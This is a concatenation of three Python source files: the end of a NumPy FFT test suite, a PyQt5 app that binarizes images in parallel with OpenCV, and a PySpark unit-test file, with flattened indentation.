assert_array_almost_equal(x, fft.irfft(fft.rfft(x)))
for norm in ["backward", "ortho", "forward"]:
assert_array_almost_equal(
x, fft.irfft(fft.rfft(x, norm=norm), norm=norm))
def test_rfft2(self):
x = random((30, 20))
expect = fft.fft2(x)[:, :11]
assert_array_almost_equal(expect, fft.rfft2(x))
assert_array_almost_equal(expect, fft.rfft2(x, norm="backward"))
assert_array_almost_equal(expect / np.sqrt(30 * 20),
fft.rfft2(x, norm="ortho"))
assert_array_almost_equal(expect / (30 * 20),
fft.rfft2(x, norm="forward"))
def test_irfft2(self):
x = random((30, 20))
assert_array_almost_equal(x, fft.irfft2(fft.rfft2(x)))
for norm in ["backward", "ortho", "forward"]:
assert_array_almost_equal(
x, fft.irfft2(fft.rfft2(x, norm=norm), norm=norm))
def test_rfftn(self):
x = random((30, 20, 10))
expect = fft.fftn(x)[:, :, :6]
assert_array_almost_equal(expect, fft.rfftn(x))
assert_array_almost_equal(expect, fft.rfftn(x, norm="backward"))
assert_array_almost_equal(expect / np.sqrt(30 * 20 * 10),
fft.rfftn(x, norm="ortho"))
assert_array_almost_equal(expect / (30 * 20 * 10),
fft.rfftn(x, norm="forward"))
def test_irfftn(self):
x = random((30, 20, 10))
assert_array_almost_equal(x, fft.irfftn(fft.rfftn(x)))
for norm in ["backward", "ortho", "forward"]:
assert_array_almost_equal(
x, fft.irfftn(fft.rfftn(x, norm=norm), norm=norm))
def test_hfft(self):
x = random(14) + 1j*random(14)
x_herm = np.concatenate((random(1), x, random(1)))
x = np.concatenate((x_herm, x[::-1].conj()))
expect = fft.fft(x)
assert_array_almost_equal(expect, fft.hfft(x_herm))
assert_array_almost_equal(expect, fft.hfft(x_herm, norm="backward"))
assert_array_almost_equal(expect / np.sqrt(30),
fft.hfft(x_herm, norm="ortho"))
assert_array_almost_equal(expect / 30,
fft.hfft(x_herm, norm="forward"))
def test_ihfft(self):
x = random(14) + 1j*random(14)
x_herm = np.concatenate((random(1), x, random(1)))
x = np.concatenate((x_herm, x[::-1].conj()))
assert_array_almost_equal(x_herm, fft.ihfft(fft.hfft(x_herm)))
for norm in ["backward", "ortho", "forward"]:
assert_array_almost_equal(
x_herm, fft.ihfft(fft.hfft(x_herm, norm=norm), norm=norm))
def test_hfft2(self):
x = random((30, 20))
assert_array_almost_equal(x, fft.hfft2(fft.ihfft2(x)))
for norm in ["backward", "ortho", "forward"]:
assert_array_almost_equal(
x, fft.hfft2(fft.ihfft2(x, norm=norm), norm=norm))
def test_ihfft2(self):
x = random((30, 20))
expect = fft.ifft2(x)[:, :11]
assert_array_almost_equal(expect, fft.ihfft2(x))
assert_array_almost_equal(expect, fft.ihfft2(x, norm="backward"))
assert_array_almost_equal(expect * np.sqrt(30 * 20),
fft.ihfft2(x, norm="ortho"))
assert_array_almost_equal(expect * (30 * 20),
fft.ihfft2(x, norm="forward"))
def test_hfftn(self):
x = random((30, 20, 10))
assert_array_almost_equal(x, fft.hfftn(fft.ihfftn(x)))
for norm in ["backward", "ortho", "forward"]:
assert_array_almost_equal(
x, fft.hfftn(fft.ihfftn(x, norm=norm), norm=norm))
def test_ihfftn(self):
x = random((30, 20, 10))
expect = fft.ifftn(x)[:, :, :6]
assert_array_almost_equal(expect, fft.ihfftn(x))
assert_array_almost_equal(expect, fft.ihfftn(x, norm="backward"))
assert_array_almost_equal(expect * np.sqrt(30 * 20 * 10),
fft.ihfftn(x, norm="ortho"))
assert_array_almost_equal(expect * (30 * 20 * 10),
fft.ihfftn(x, norm="forward"))
@pytest.mark.parametrize("op", [fft.fftn, fft.ifftn,
fft.rfftn, fft.irfftn,
fft.hfftn, fft.ihfftn])
def test_axes(self, op):
x = random((30, 20, 10))
axes = [(0, 1, 2), (0, 2, 1), (1, 0, 2), (1, 2, 0), (2, 0, 1), (2, 1, 0)]
for a in axes:
op_tr = op(np.transpose(x, a))
tr_op = np.transpose(op(x, axes=a), a)
assert_array_almost_equal(op_tr, tr_op)
@pytest.mark.parametrize("op", [fft.fft2, fft.ifft2,
fft.rfft2, fft.irfft2,
fft.hfft2, fft.ihfft2,
fft.fftn, fft.ifftn,
fft.rfftn, fft.irfftn,
fft.hfftn, fft.ihfftn])
def test_axes_subset_with_shape(self, op):
x = random((16, 8, 4))
axes = [(0, 1, 2), (0, 2, 1), (1, 2, 0)]
for a in axes:
# different shape on the first two axes
shape = tuple([2*x.shape[ax] if ax in a[:2] else x.shape[ax]
for ax in range(x.ndim)])
# transform only the first two axes
op_tr = op(np.transpose(x, a), s=shape[:2], axes=(0, 1))
tr_op = np.transpose(op(x, s=shape[:2], axes=a[:2]), a)
assert_array_almost_equal(op_tr, tr_op)
def test_all_1d_norm_preserving(self):
# verify that round-trip transforms are norm-preserving
x = random(30)
x_norm = np.linalg.norm(x)
n = x.size * 2
func_pairs = [(fft.fft, fft.ifft),
(fft.rfft, fft.irfft),
# hfft: order so the first function takes x.size samples
# (necessary for comparison to x_norm above)
(fft.ihfft, fft.hfft),
]
for forw, back in func_pairs:
for n in [x.size, 2*x.size]:
for norm in ['backward', 'ortho', 'forward']:
tmp = forw(x, n=n, norm=norm)
tmp = back(tmp, n=n, norm=norm)
assert_array_almost_equal(x_norm,
np.linalg.norm(tmp))
@pytest.mark.parametrize("dtype", [np.half, np.single, np.double,
np.longdouble])
def test_dtypes(self, dtype):
# make sure that all input precisions are accepted
x = random(30).astype(dtype)
assert_array_almost_equal(fft.ifft(fft.fft(x)), x)
assert_array_almost_equal(fft.irfft(fft.rfft(x)), x)
assert_array_almost_equal(fft.hfft(fft.ihfft(x), len(x)), x)
@pytest.mark.parametrize(
"dtype",
[np.float32, np.float64, np.longfloat,
np.complex64, np.complex128, np.longcomplex])
@pytest.mark.parametrize("order", ["F", 'non-contiguous'])
@pytest.mark.parametrize(
"fft",
[fft.fft, fft.fft2, fft.fftn,
fft.ifft, fft.ifft2, fft.ifftn])
def test_fft_with_order(dtype, order, fft):
# Check that FFT/IFFT produces identical results for C, Fortran and
# non contiguous arrays
rng = np.random.RandomState(42)
X = rng.rand(8, 7, 13).astype(dtype, copy=False)
if order == 'F':
Y = np.asfortranarray(X)
else:
# Make a non contiguous array
Y = X[::-1]
X = np.ascontiguousarray(X[::-1])
if fft.__name__.endswith('fft'):
for axis in range(3):
X_res = fft(X, axis=axis)
Y_res = fft(Y, axis=axis)
assert_array_almost_equal(X_res, Y_res)
elif fft.__name__.endswith(('fft2', 'fftn')):
axes = [(0, 1), (1, 2), (0, 2)]
if fft.__name__.endswith('fftn'):
axes.extend([(0,), (1,), (2,), None])
for ax in axes:
X_res = fft(X, axes=ax)
Y_res = fft(Y, axes=ax)
assert_array_almost_equal(X_res, Y_res)
else:
raise ValueError
class TestFFTThreadSafe(object):
threads = 16
input_shape = (800, 200)
def _test_mtsame(self, func, *args):
def worker(args, q):
q.put(func(*args))
q = queue.Queue()
expected = func(*args)
# Spin off a bunch of threads to call the same function simultaneously
t = [threading.Thread(target=worker, args=(args, q))
for i in range(self.threads)]
[x.start() for x in t]
[x.join() for x in t]
# Make sure all threads returned the correct value
for i in range(self.threads):
assert_array_equal(q.get(timeout=5), expected,
'Function returned wrong value in multithreaded context')
def test_fft(self):
a = np.ones(self.input_shape, dtype=np.complex128)
self._test_mtsame(fft.fft, a)
def test_ifft(self):
a = np.full(self.input_shape, 1+0j)
self._test_mtsame(fft.ifft, a)
def test_rfft(self):
a = np.ones(self.input_shape)
self._test_mtsame(fft.rfft, a)
def test_irfft(self):
a = np.full(self.input_shape, 1+0j)
self._test_mtsame(fft.irfft, a)
def test_hfft(self):
a = np.ones(self.input_shape, np.complex64)
self._test_mtsame(fft.hfft, a)
def test_ihfft(self):
a = np.ones(self.input_shape)
self._test_mtsame(fft.ihfft, a)
@pytest.mark.parametrize("func", [fft.fft, fft.ifft, fft.rfft, fft.irfft])
def test_multiprocess(func):
# Test that fft still works after fork (gh-10422)
with multiprocessing.Pool(2) as p:
res = p.map(func, [np.ones(100) for _ in range(4)])
expect = func(np.ones(100))
for x in res:
assert_allclose(x, expect)
class TestIRFFTN(object):
def test_not_last_axis_success(self):
ar, ai = np.random.random((2, 16, 8, 32))
a = ar + 1j*ai
axes = (-2,)
# Should not raise error
fft.irfftn(a, axes=axes)
|
main.py
|
import sys  # sys is needed to pass argv to QApplication
import os
import time
import threading
from multiprocessing import Queue, Pool, Manager, Lock, current_process
import psutil
import shutil
import cv2
import numpy as np
from PyQt5 import QtWidgets, QtGui, QtCore
import design  # our UI module generated from the Qt Designer file
import images_shower
tasks_queue = Queue()
unblocking_queue = Queue()
FINISH_TASK = "Finish"
BLOCKING_TASK = "Block"
PROCESSES_COUNT = 10
START_PROCESSES_COUNT = 4
WAITING_TEXT = "waiting"
READY_TEXT = "ready"
TMP_DIRECTORY = "tmp"
SHOWING_IMAGE_WIDTH = 526
SHOWING_IMAGE_HEIGHT = 669
RIGHT_EFFICIENCY = 0.8
LEFT_EFFICIENCY = 0.4
results_queue = Queue()
atomic_operation = Lock()
def binarize_image(image):
"""
    Takes an image as a BGR numpy array (as returned by cv2.imread)
    """
    image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
_, image = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
return image
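# Usage sketch (hypothetical file names, for illustration only):
#
#     img = cv2.imread("scan.png")     # BGR image as loaded by OpenCV
#     bw = binarize_image(img)         # single-channel image of 0s and 255s
#     cv2.imwrite("scan_bw.png", bw)
#
# With cv2.THRESH_OTSU the fixed threshold passed to cv2.threshold (0 here) is
# ignored; Otsu's method derives the threshold from the image histogram.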
def save_tmp_image(image, file_path):
if not os.path.exists(TMP_DIRECTORY):
os.mkdir(TMP_DIRECTORY)
_, file_name = os.path.split(file_path)
result_path = os.path.join(TMP_DIRECTORY, file_name)
cv2.imwrite(result_path, image)
def worker_fun(tasks_queue, results_queue, unblocking_queue, namespace, atomic_operation):
unblocking_task = unblocking_queue.get()
namespace.currently_working_processes += 1
while True:
task = tasks_queue.get()
if task == FINISH_TASK:
results_queue.put(task)
break
if task == BLOCKING_TASK:
atomic_operation.acquire()
            if namespace.currently_working_processes != 1:  # never block the last remaining worker
namespace.currently_working_processes -= 1
atomic_operation.release()
unblocking_task = unblocking_queue.get()
namespace.currently_working_processes += 1
else:
atomic_operation.release()
tasks_queue.put(BLOCKING_TASK)
continue
file_name = task.split(' ')[1]
        # Check whether enough memory is available.
        # If it is, load and process the image.
file_size = os.path.getsize(file_name)
namespace.currently_taking_memory += file_size
        available_memory = psutil.virtual_memory().available  # available memory, in bytes
if namespace.currently_taking_memory >= (available_memory - 1024):
            # Cannot start the task right now, put it back into the queue
tasks_queue.put(task)
namespace.currently_taking_memory -= file_size
continue
        # Start measuring the processing time here
start_all_time, start_process_time = time.time(), time.process_time()
image = cv2.imread(file_name)
namespace.currently_taking_memory -= file_size
image = binarize_image(image)
        # Save the result into the tmp directory under the original file name
save_tmp_image(image, file_name)
        # Stop measuring the processing time here
end_all_time, end_process_time = time.time(), time.process_time()
efficiency = (end_process_time - start_process_time) / (end_all_time - start_all_time)
if efficiency > RIGHT_EFFICIENCY:
unblocking_queue.put("1")
if efficiency < LEFT_EFFICIENCY and (end_process_time - start_process_time) != 0.0:
tasks_queue.put(BLOCKING_TASK)
results_queue.put(task)
return
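# Explanatory note on the throttling in worker_fun: efficiency is CPU time
# divided by wall-clock time for one image. A value above RIGHT_EFFICIENCY
# (0.8) suggests the work is CPU-bound, so a token goes onto unblocking_queue
# to wake one more parked worker; a value below LEFT_EFFICIENCY (0.4) suggests
# the worker mostly waited on I/O, so a BLOCKING_TASK is queued and whichever
# worker picks it up parks itself, unless it is the only active one.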
class ImagesWindow(QtWidgets.QMainWindow, images_shower.Ui_ImagesShower):
def __init__(self, file_path):
super().__init__()
self.setupUi(self)
self.setFixedSize(self.size())
label_original_image = QtWidgets.QLabel(self.originalImageFrame)
original_image_object = QtGui.QImage(file_path)
original_image_object = original_image_object.scaled(SHOWING_IMAGE_WIDTH, SHOWING_IMAGE_HEIGHT,
aspectRatioMode=QtCore.Qt.KeepAspectRatio,
transformMode=QtCore.Qt.SmoothTransformation)
label_original_image.setPixmap(QtGui.QPixmap.fromImage(original_image_object))
_, file_name = os.path.split(file_path)
tmp_path = os.path.join(TMP_DIRECTORY, file_name)
label_result_image = QtWidgets.QLabel(self.resultImageFrame)
result_image_object = QtGui.QImage(tmp_path)
result_image_object = result_image_object.scaled(SHOWING_IMAGE_WIDTH, SHOWING_IMAGE_HEIGHT,
aspectRatioMode=QtCore.Qt.KeepAspectRatio,
transformMode=QtCore.Qt.SmoothTransformation)
label_result_image.setPixmap(QtGui.QPixmap.fromImage(result_image_object))
class MainApp(QtWidgets.QMainWindow, design.Ui_MyWowApp):
def __init__(self):
        # Needed here to get access to the variables, methods,
        # etc. defined in design.py
        super().__init__()
        self.setupUi(self)  # initialize the generated UI
self.tasks_count = 0
self.addTaskButton.clicked.connect(self.upload_new_images)
self.saveAllResultsButton.clicked.connect(self.save_all_results)
self.tasksListWidget.itemActivated.connect(self.task_selected_event)
self.updating_result_thread = threading.Thread(target=self.update_result_info)
self.updating_result_thread.start()
        # Put only 4 tokens into the unblocking queue, i.e. unblock 4 worker processes to start with
for _ in range(START_PROCESSES_COUNT):
unblocking_queue.put("1")
def upload_new_images(self):
files = QtWidgets.QFileDialog.getOpenFileNames(self,
"Select one or more files",
"/home",
"Images (*.png *.xpm *.jpg)")
if files:
for file in files[0]:
self.tasks_count += 1
task_name = str(self.tasks_count) + ". " + file
self.tasksListWidget.addItem(task_name)
tasks_queue.put(task_name)
                # Start the processing-progress entry for this task
self.processListWidget.addItem(str(self.tasks_count) + ". " + WAITING_TEXT)
def update_result_info(self):
while True:
task = results_queue.get()
if task == FINISH_TASK:
break
task_id = task.split('.')[0]
self.processListWidget.item(int(task_id) - 1).setText(task_id + ". " + READY_TEXT)
return
def check_if_the_task_is_ready(self, task_id):
"""
        task_id - an int index used to look up the item in processListWidget
        Returns True if the task is finished, False otherwise
"""
process_text = self.processListWidget.item(task_id).text().split(' ')[1]
if process_text == READY_TEXT:
return True
return False
def task_selected_event(self, item):
split_item_text = item.text().split(' ')
file_path = split_item_text[1]
task_id = int(split_item_text[0].split('.')[0]) - 1
        # Check that the task is finished; only then open a new window with the image
if self.check_if_the_task_is_ready(task_id):
self.images_dialog = ImagesWindow(file_path)
self.images_dialog.show()
def save_all_results(self):
if not os.path.isdir(TMP_DIRECTORY):
return
directory_to_save = str(QtWidgets.QFileDialog.getExistingDirectory(self, "Select Directory"))
        # Copy the files from the tmp directory into directory_to_save
for file_name in os.listdir(TMP_DIRECTORY):
tmp_path = os.path.join(TMP_DIRECTORY, file_name)
shutil.copy(tmp_path, directory_to_save)
def closeEvent(self, event):
for _ in range(PROCESSES_COUNT):
tasks_queue.put(FINISH_TASK)
if os.path.exists(TMP_DIRECTORY):
shutil.rmtree(TMP_DIRECTORY)
event.accept()
def run_app():
    app = QtWidgets.QApplication(sys.argv)  # new QApplication instance
    window = MainApp()  # create the MainApp window
    window.show()  # show the window
    app.exec_()  # and start the event loop
if __name__ == '__main__':  # run only when this file is executed directly, not imported
shared_data_manager = Manager()
namespace = shared_data_manager.Namespace()
namespace.currently_taking_memory = 0
namespace.currently_working_processes = 0
with Pool(PROCESSES_COUNT, worker_fun, (tasks_queue, results_queue, unblocking_queue, namespace, atomic_operation)) as workers_pool:
run_app()
|
tests.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Unit tests for PySpark; additional tests are implemented as doctests in
individual modules.
"""
from array import array
from fileinput import input
from glob import glob
import os
import re
import shutil
import subprocess
import sys
import tempfile
import time
import zipfile
import random
from platform import python_implementation
if sys.version_info[:2] <= (2, 6):
import unittest2 as unittest
else:
import unittest
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
from pyspark.files import SparkFiles
from pyspark.serializers import read_int, BatchedSerializer, MarshalSerializer, PickleSerializer, \
CloudPickleSerializer
from pyspark.shuffle import Aggregator, InMemoryMerger, ExternalMerger, ExternalSorter
from pyspark.sql import SQLContext, IntegerType, Row
from pyspark import shuffle
_have_scipy = False
_have_numpy = False
try:
import scipy.sparse
_have_scipy = True
except:
# No SciPy, but that's okay, we'll skip those tests
pass
try:
import numpy as np
_have_numpy = True
except:
# No NumPy, but that's okay, we'll skip those tests
pass
SPARK_HOME = os.environ["SPARK_HOME"]
class TestMerger(unittest.TestCase):
def setUp(self):
self.N = 1 << 16
self.l = [i for i in xrange(self.N)]
self.data = zip(self.l, self.l)
self.agg = Aggregator(lambda x: [x],
lambda x, y: x.append(y) or x,
lambda x, y: x.extend(y) or x)
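    # The three callables passed to Aggregator mirror Spark's combiner
    # interface: createCombiner wraps the first value for a key in a list,
    # mergeValue appends a later value to that list, and mergeCombiners
    # concatenates two per-key lists (the `or x` trick returns the mutated
    # list, since append/extend themselves return None).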
def test_in_memory(self):
m = InMemoryMerger(self.agg)
m.mergeValues(self.data)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
m = InMemoryMerger(self.agg)
m.mergeCombiners(map(lambda (x, y): (x, [y]), self.data))
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
def test_small_dataset(self):
m = ExternalMerger(self.agg, 1000)
m.mergeValues(self.data)
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 1000)
m.mergeCombiners(map(lambda (x, y): (x, [y]), self.data))
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
def test_medium_dataset(self):
m = ExternalMerger(self.agg, 10)
m.mergeValues(self.data)
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 10)
m.mergeCombiners(map(lambda (x, y): (x, [y]), self.data * 3))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)) * 3)
def test_huge_dataset(self):
m = ExternalMerger(self.agg, 10)
m.mergeCombiners(map(lambda (k, v): (k, [str(v)]), self.data * 10))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(len(v) for k, v in m._recursive_merged_items(0)),
self.N * 10)
m._cleanup()
class TestSorter(unittest.TestCase):
def test_in_memory_sort(self):
l = range(1024)
random.shuffle(l)
sorter = ExternalSorter(1024)
self.assertEquals(sorted(l), list(sorter.sorted(l)))
self.assertEquals(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertEquals(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertEquals(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
def test_external_sort(self):
l = range(1024)
random.shuffle(l)
sorter = ExternalSorter(1)
self.assertEquals(sorted(l), list(sorter.sorted(l)))
self.assertGreater(shuffle.DiskBytesSpilled, 0)
last = shuffle.DiskBytesSpilled
self.assertEquals(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEquals(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEquals(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
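    # The constructor argument is the sorter's memory budget (megabytes in
    # this version of pyspark.shuffle), so ExternalSorter(1) above is forced
    # to spill to disk; the growing shuffle.DiskBytesSpilled counter after
    # each sort is what verifies that.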
def test_external_sort_in_rdd(self):
conf = SparkConf().set("spark.python.worker.memory", "1m")
sc = SparkContext(conf=conf)
l = range(10240)
random.shuffle(l)
rdd = sc.parallelize(l, 10)
self.assertEquals(sorted(l), rdd.sortBy(lambda x: x).collect())
sc.stop()
class SerializationTestCase(unittest.TestCase):
def test_namedtuple(self):
from collections import namedtuple
from cPickle import dumps, loads
P = namedtuple("P", "x y")
p1 = P(1, 3)
p2 = loads(dumps(p1, 2))
self.assertEquals(p1, p2)
def test_itemgetter(self):
from operator import itemgetter
ser = CloudPickleSerializer()
d = range(10)
getter = itemgetter(1)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = itemgetter(0, 3)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
def test_attrgetter(self):
from operator import attrgetter
ser = CloudPickleSerializer()
class C(object):
def __getattr__(self, item):
return item
d = C()
getter = attrgetter("a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("a", "b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
d.e = C()
getter = attrgetter("e.a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("e.a", "e.b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
# Regression test for SPARK-3415
def test_pickling_file_handles(self):
ser = CloudPickleSerializer()
out1 = sys.stderr
out2 = ser.loads(ser.dumps(out1))
self.assertEquals(out1, out2)
def test_func_globals(self):
class Unpicklable(object):
def __reduce__(self):
raise Exception("not picklable")
global exit
exit = Unpicklable()
ser = CloudPickleSerializer()
self.assertRaises(Exception, lambda: ser.dumps(exit))
def foo():
sys.exit(0)
self.assertTrue("exit" in foo.func_code.co_names)
ser.dumps(foo)
class PySparkTestCase(unittest.TestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
self.sc = SparkContext('local[4]', class_name, batchSize=2)
def tearDown(self):
self.sc.stop()
sys.path = self._old_sys_path
class TestCheckpoint(PySparkTestCase):
def setUp(self):
PySparkTestCase.setUp(self)
self.checkpointDir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.checkpointDir.name)
self.sc.setCheckpointDir(self.checkpointDir.name)
def tearDown(self):
PySparkTestCase.tearDown(self)
shutil.rmtree(self.checkpointDir.name)
def test_basic_checkpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
self.assertEqual("file:" + self.checkpointDir.name,
os.path.dirname(os.path.dirname(flatMappedRDD.getCheckpointFile())))
def test_checkpoint_and_restore(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: [x])
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
flatMappedRDD.count() # forces a checkpoint to be computed
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.getCheckpointFile() is not None)
recovered = self.sc._checkpointFile(flatMappedRDD.getCheckpointFile(),
flatMappedRDD._jrdd_deserializer)
self.assertEquals([1, 2, 3, 4], recovered.collect())
class TestAddFile(PySparkTestCase):
def test_add_py_file(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this job fails due to `userlibrary` not being on the Python path:
# disable logging in log4j temporarily
log4j = self.sc._jvm.org.apache.log4j
old_level = log4j.LogManager.getRootLogger().getLevel()
log4j.LogManager.getRootLogger().setLevel(log4j.Level.FATAL)
def func(x):
from userlibrary import UserClass
return UserClass().hello()
self.assertRaises(Exception,
self.sc.parallelize(range(2)).map(func).first)
log4j.LogManager.getRootLogger().setLevel(old_level)
# Add the file, so the job should now succeed:
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
res = self.sc.parallelize(range(2)).map(func).first()
self.assertEqual("Hello World!", res)
def test_add_file_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
self.sc.addFile(path)
download_path = SparkFiles.get("hello.txt")
self.assertNotEqual(path, download_path)
with open(download_path) as test_file:
self.assertEquals("Hello World!\n", test_file.readline())
def test_add_py_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlibrary import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addFile(path)
from userlibrary import UserClass
self.assertEqual("Hello World!", UserClass().hello())
def test_add_egg_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlib import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlib-0.1-py2.7.egg")
self.sc.addPyFile(path)
from userlib import UserClass
self.assertEqual("Hello World from inside a package!", UserClass().hello())
def test_overwrite_system_module(self):
self.sc.addPyFile(os.path.join(SPARK_HOME, "python/test_support/SimpleHTTPServer.py"))
import SimpleHTTPServer
self.assertEqual("My Server", SimpleHTTPServer.__name__)
def func(x):
import SimpleHTTPServer
return SimpleHTTPServer.__name__
self.assertEqual(["My Server"], self.sc.parallelize(range(1)).map(func).collect())
class TestRDDFunctions(PySparkTestCase):
def test_id(self):
rdd = self.sc.parallelize(range(10))
id = rdd.id()
self.assertEqual(id, rdd.id())
rdd2 = rdd.map(str).filter(bool)
id2 = rdd2.id()
self.assertEqual(id + 1, id2)
self.assertEqual(id2, rdd2.id())
def test_failed_sparkcontext_creation(self):
# Regression test for SPARK-1550
self.sc.stop()
self.assertRaises(Exception, lambda: SparkContext("an-invalid-master-name"))
self.sc = SparkContext("local")
def test_save_as_textfile_with_unicode(self):
# Regression test for SPARK-970
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = ''.join(input(glob(tempFile.name + "/part-0000*")))
self.assertEqual(x, unicode(raw_contents.strip(), "utf-8"))
def test_save_as_textfile_with_utf8(self):
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x.encode("utf-8")])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = ''.join(input(glob(tempFile.name + "/part-0000*")))
self.assertEqual(x, unicode(raw_contents.strip(), "utf-8"))
def test_transforming_cartesian_result(self):
# Regression test for SPARK-1034
rdd1 = self.sc.parallelize([1, 2])
rdd2 = self.sc.parallelize([3, 4])
cart = rdd1.cartesian(rdd2)
result = cart.map(lambda (x, y): x + y).collect()
def test_transforming_pickle_file(self):
# Regression test for SPARK-2601
data = self.sc.parallelize(["Hello", "World!"])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsPickleFile(tempFile.name)
pickled_file = self.sc.pickleFile(tempFile.name)
pickled_file.map(lambda x: x).collect()
def test_cartesian_on_textfile(self):
# Regression test for
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
a = self.sc.textFile(path)
result = a.cartesian(a).collect()
(x, y) = result[0]
self.assertEqual("Hello World!", x.strip())
self.assertEqual("Hello World!", y.strip())
def test_deleting_input_files(self):
# Regression test for SPARK-1025
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write("Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
self.assertRaises(Exception, lambda: filtered_data.count())
def testAggregateByKey(self):
data = self.sc.parallelize([(1, 1), (1, 1), (3, 2), (5, 1), (5, 3)], 2)
def seqOp(x, y):
x.add(y)
return x
def combOp(x, y):
x |= y
return x
sets = dict(data.aggregateByKey(set(), seqOp, combOp).collect())
self.assertEqual(3, len(sets))
self.assertEqual(set([1]), sets[1])
self.assertEqual(set([2]), sets[3])
self.assertEqual(set([1, 3]), sets[5])
def test_itemgetter(self):
rdd = self.sc.parallelize([range(10)])
from operator import itemgetter
self.assertEqual([1], rdd.map(itemgetter(1)).collect())
self.assertEqual([(2, 3)], rdd.map(itemgetter(2, 3)).collect())
def test_namedtuple_in_rdd(self):
from collections import namedtuple
Person = namedtuple("Person", "id firstName lastName")
jon = Person(1, "Jon", "Doe")
jane = Person(2, "Jane", "Doe")
theDoes = self.sc.parallelize([jon, jane])
self.assertEquals([jon, jane], theDoes.collect())
def test_large_broadcast(self):
N = 100000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 270MB
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEquals(N, m)
def test_large_closure(self):
N = 1000000
data = [float(i) for i in xrange(N)]
m = self.sc.parallelize(range(1), 1).map(lambda x: len(data)).sum()
self.assertEquals(N, m)
def test_zip_with_different_serializers(self):
a = self.sc.parallelize(range(5))
b = self.sc.parallelize(range(100, 105))
